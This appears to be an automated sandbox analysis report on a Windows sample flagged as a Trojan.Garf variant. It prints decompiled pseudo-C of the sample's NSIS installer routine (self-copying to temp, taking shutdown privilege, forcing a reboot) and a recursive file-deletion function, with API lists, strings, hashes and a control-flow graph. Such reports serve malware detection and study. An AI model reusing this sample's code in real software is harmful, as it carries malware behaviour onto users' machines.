				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                                                              0x0040364e
                                                                                              0x0040364f
                                                                                              0x00403656
                                                                                              0x00403659
                                                                                              0x00403660
                                                                                              0x00403663
                                                                                              0x00403676
                                                                                              0x0040367c
                                                                                              0x0040367f
                                                                                              0x00403682
                                                                                              0x00403690
                                                                                              0x00403698
                                                                                              0x004036a3
                                                                                              0x004036bc
                                                                                              0x004036be
                                                                                              0x004036c6
                                                                                              0x004036c6
                                                                                              0x004036d1
                                                                                              0x004036d3
                                                                                              0x004036d3
                                                                                              0x004036e8
                                                                                              0x0040370d
                                                                                              0x0040371b
                                                                                              0x0040371e
                                                                                              0x00403725
                                                                                              0x0040372c
                                                                                              0x0040372c
                                                                                              0x00403725
                                                                                              0x0040372e
                                                                                              0x00403733
                                                                                              0x00403734
                                                                                              0x00403740
                                                                                              0x00403744
                                                                                              0x0040374b
                                                                                              0x00403759
                                                                                              0x0040375e
                                                                                              0x00403765
                                                                                              0x00403769
                                                                                              0x0040376d
                                                                                              0x0040376f
                                                                                              0x0040376f
                                                                                              0x0040376d
                                                                                              0x00403776
                                                                                              0x0040377d
                                                                                              0x00403783
                                                                                              0x0040379b
                                                                                              0x004037ab
                                                                                              0x004037b0
                                                                                              0x004037b6
                                                                                              0x004037bd
                                                                                              0x004037c4
                                                                                              0x004037c6
                                                                                              0x004037c7
                                                                                              0x004037d1
                                                                                              0x004037d8
                                                                                              0x004037da
                                                                                              0x004037dc
                                                                                              0x004037dc
                                                                                              0x004037ef
                                                                                              0x004037f1
                                                                                              0x004038eb
                                                                                              0x004038eb
                                                                                              0x004038ee
                                                                                              0x004038f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004037fb
                                                                                              0x004037fc
                                                                                              0x004037ff
                                                                                              0x00403808
                                                                                              0x00403808
                                                                                              0x0040380b
                                                                                              0x0040380e
                                                                                              0x00403811
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403815
                                                                                              0x00403819
                                                                                              0x004038d9
                                                                                              0x004038e2
                                                                                              0x004038e4
                                                                                              0x004038e7
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x00000000
                                                                                              0x0040381f
                                                                                              0x00403820
                                                                                              0x00403821
                                                                                              0x00403825
                                                                                              0x0040383f
                                                                                              0x00403846
                                                                                              0x00403859
                                                                                              0x0040385a
                                                                                              0x0040386f
                                                                                              0x00403874
                                                                                              0x00403876
                                                                                              0x00403878
                                                                                              0x00403894
                                                                                              0x0040389b
                                                                                              0x004038ae
                                                                                              0x004038af
                                                                                              0x004038c4
                                                                                              0x004038ca
                                                                                              0x004038cc
                                                                                              0x004038ce
                                                                                              0x004038d6
                                                                                              0x004038d8
                                                                                              0x00000000
                                                                                              0x004038d8
                                                                                              0x004038d2
                                                                                              0x004038d4
                                                                                              0x004038f9
                                                                                              0x004038fd
                                                                                              0x00403906
                                                                                              0x0040390b
                                                                                              0x00403911
                                                                                              0x0040391c
                                                                                              0x0040391e
                                                                                              0x00403923
                                                                                              0x00403925
                                                                                              0x0040397d
                                                                                              0x00403982
                                                                                              0x0040398b
                                                                                              0x00403992
                                                                                              0x00403995
                                                                                              0x00403b6c
                                                                                              0x00403b6c
                                                                                              0x00403b71
                                                                                              0x00403b7a
                                                                                              0x00403b97
                                                                                              0x00403c0f
                                                                                              0x00403c0f
                                                                                              0x00403c17
                                                                                              0x00403c19
                                                                                              0x00403c19
                                                                                              0x00403c1f
                                                                                              0x00403c1f
                                                                                              0x00403bae
                                                                                              0x00403bba
                                                                                              0x00403bcb
                                                                                              0x00403bd2
                                                                                              0x00403bd9
                                                                                              0x00403bd9
                                                                                              0x00403be1
                                                                                              0x00403bed
                                                                                              0x00403bfb
                                                                                              0x00403c06
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403bef
                                                                                              0x00403bef
                                                                                              0x00403bf0
                                                                                              0x00403bf2
                                                                                              0x00403bf3
                                                                                              0x00403bf4
                                                                                              0x00403bf9
                                                                                              0x00403c08
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403bf9
                                                                                              0x00403bed
                                                                                              0x00403b84
                                                                                              0x00403b8b
                                                                                              0x00403b8b
                                                                                              0x004039a1
                                                                                              0x00403a48
                                                                                              0x00403a48
                                                                                              0x00403a54
                                                                                              0x00000000
                                                                                              0x00403a54
                                                                                              0x004039b2
                                                                                              0x004039ba
                                                                                              0x00403a0c
                                                                                              0x00403a0c
                                                                                              0x00403a12
                                                                                              0x00403a19
                                                                                              0x00403a67
                                                                                              0x00403a69
                                                                                              0x00403a6e
                                                                                              0x00403a70
                                                                                              0x00403a78
                                                                                              0x00403a78
                                                                                              0x00403a83
                                                                                              0x00403a88
                                                                                              0x00403a8f
                                                                                              0x00403a95
                                                                                              0x00403a97
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00000000
                                                                                              0x00403a9d
                                                                                              0x00403a9d
                                                                                              0x00403a9f
                                                                                              0x00403aa0
                                                                                              0x00403aa9
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aaf
                                                                                              0x00403ab7
                                                                                              0x00403abe
                                                                                              0x00403ac6
                                                                                              0x00403ac6
                                                                                              0x00403ad3
                                                                                              0x00403adf
                                                                                              0x00403ae9
                                                                                              0x00403ae9
                                                                                              0x00403aeb
                                                                                              0x00403af2
                                                                                              0x00403afc
                                                                                              0x00403b08
                                                                                              0x00403b0e
                                                                                              0x00403b14
                                                                                              0x00403b17
                                                                                              0x00403b21
                                                                                              0x00403b27
                                                                                              0x00403b29
                                                                                              0x00403b2d
                                                                                              0x00403b3e
                                                                                              0x00403b44
                                                                                              0x00403b49
                                                                                              0x00403b4b
                                                                                              0x00403b4e
                                                                                              0x00403b54
                                                                                              0x00403b54
                                                                                              0x00403b4b
                                                                                              0x00403b29
                                                                                              0x00403b57
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b65
                                                                                              0x00000000
                                                                                              0x00403b65
                                                                                              0x00403a97
                                                                                              0x00403a1b
                                                                                              0x00403a1e
                                                                                              0x00403a22
                                                                                              0x00403a27
                                                                                              0x00403a29
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a35
                                                                                              0x00403a40
                                                                                              0x00403a45
                                                                                              0x00000000
                                                                                              0x00403a45
                                                                                              0x004039c3
                                                                                              0x004039db
                                                                                              0x004039ec
                                                                                              0x004039ed
                                                                                              0x004039f1
                                                                                              0x004039f3
                                                                                              0x00403a01
                                                                                              0x00403a08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a08
                                                                                              0x00403a0a
                                                                                              0x00000000
                                                                                              0x00403a0a
                                                                                              0x0040392d
                                                                                              0x00403939
                                                                                              0x0040393e
                                                                                              0x00403943
                                                                                              0x00403945
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040394d
                                                                                              0x00403955
                                                                                              0x00403966
                                                                                              0x0040396e
                                                                                              0x00403970
                                                                                              0x00403975
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x004038d4
                                                                                              0x0040387d
                                                                                              0x0040387f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403881
                                                                                              0x00403885
                                                                                              0x00403889
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00000000
                                                                                              0x00403890
                                                                                              0x0040388b
                                                                                              0x0040388e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040388e
                                                                                              0x00403827
                                                                                              0x0040382b
                                                                                              0x0040382e
                                                                                              0x00403835
                                                                                              0x00403835
                                                                                              0x00000000
                                                                                              0x00403835
                                                                                              0x00403830
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00403801
                                                                                              0x00403802
                                                                                              0x00403803
                                                                                              0x00403803
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe",00000000), ref: 004037E9
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe",00000000,?), ref: 00403A8F
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,00420F08,00000001), ref: 00403B21
                                                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                              • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 2292928366-6134877
                                                                                              • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                              • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                              • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                              • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                              C-Code - Quality: 98%
                                                                                              			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                              0x00405d7e
                                                                                              0x00405d83
                                                                                              0x00405d8c
                                                                                              0x00405d8f
                                                                                              0x00405d97
                                                                                              0x00405d9a
                                                                                              0x00405d9d
                                                                                              0x00405da5
                                                                                              0x00405da7
                                                                                              0x00405da8
                                                                                              0x00000000
                                                                                              0x00405da8
                                                                                              0x00405db3
                                                                                              0x00405db6
